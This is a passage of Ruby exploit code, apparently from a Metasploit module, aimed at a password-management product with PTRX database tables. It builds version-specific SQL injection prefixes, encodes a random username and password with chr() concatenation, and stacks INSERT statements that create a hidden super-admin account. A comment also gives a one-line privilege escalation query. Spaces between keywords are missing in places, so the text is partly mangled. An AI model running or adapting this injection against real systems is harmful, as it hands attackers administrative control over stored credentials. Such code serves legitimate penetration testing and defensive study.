# 5th step: get the cookies sent in the last response
returnres.get_cookies
end
end
end
returnnil
end
definject_sql(old_style)
# On versions older than 7000 the injection is slightly different (we call it "old style").
# For "new style" versions we can escalate to super admin by doing
# "update aaaauthorizedrole set role_id=1 where account_id=#{user_id};insert into ptrx_superadmin values (#{user_id},true);"
# However for code simplicity let's just create a brand new user which works for both "old style" and "new style" versions.
ifold_style
sqli_prefix='\\\'))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") as '+Rex::Text.rand_text_alpha_lower(rand(8)+3)+";"
else
sqli_prefix='\\\'))))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") AS Ptrx_DummyPwds GROUP BY "PTRX_RID","PTRX_RNAME","PTRX_DESC","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24") as '+Rex::Text.rand_text_alpha_lower(rand(8)+3)+";"
end
user_id=Rex::Text.rand_text_numeric(4)
time=Rex::Text.rand_text_numeric(8)
username=Rex::Text.rand_text_alpha_lower(6)
username_chr=""
username.each_chardo|c|
username_chr<<'chr('<<c.ord.to_s<<')||'
end
username_chr.chop!.chop!
password=Rex::Text.rand_text_alphanumeric(10)
password_chr=""
password.each_chardo|c|
password_chr<<'chr('<<c.ord.to_s<<')||'
end
password_chr.chop!.chop!
group_chr=""
'Default Group'.each_chardo|c|
group_chr<<'chr('<<c.ord.to_s<<')||'
end
group_chr.chop!.chop!
sqli_command=
"insert into aaauser values (#{user_id},$$$$,$$$$,$$$$,#{time},$$$$);"+
"insert into aaapassword values (#{user_id},#{password_chr},$$$$,0,2,1,#{time});"+
"insert into aaauserstatus values (#{user_id},$$ACTIVE$$,#{time});"+
"insert into aaalogin values (#{user_id},#{user_id},#{username_chr});"+
"insert into aaaaccount values (#{user_id},#{user_id},1,1,#{time});"+
"insert into aaaauthorizedrole values (#{user_id},1);"+
"insert into aaaaccountstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});"+
"insert into aaapasswordstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});"+
"insert into aaaaccadminprofile values (#{user_id},$$"+Rex::Text.rand_text_alpha_upper(8)+"$$,-1,-1,-1,-1,-1,false,-1,-1,-1,$$$$);"+
"insert into aaaaccpassword values (#{user_id},#{user_id});"+
"insert into ptrx_resourcegroup values (#{user_id},3,#{user_id},0,0,0,0,#{group_chr},$$$$);"+
"insert into ptrx_superadmin values (#{user_id},true);"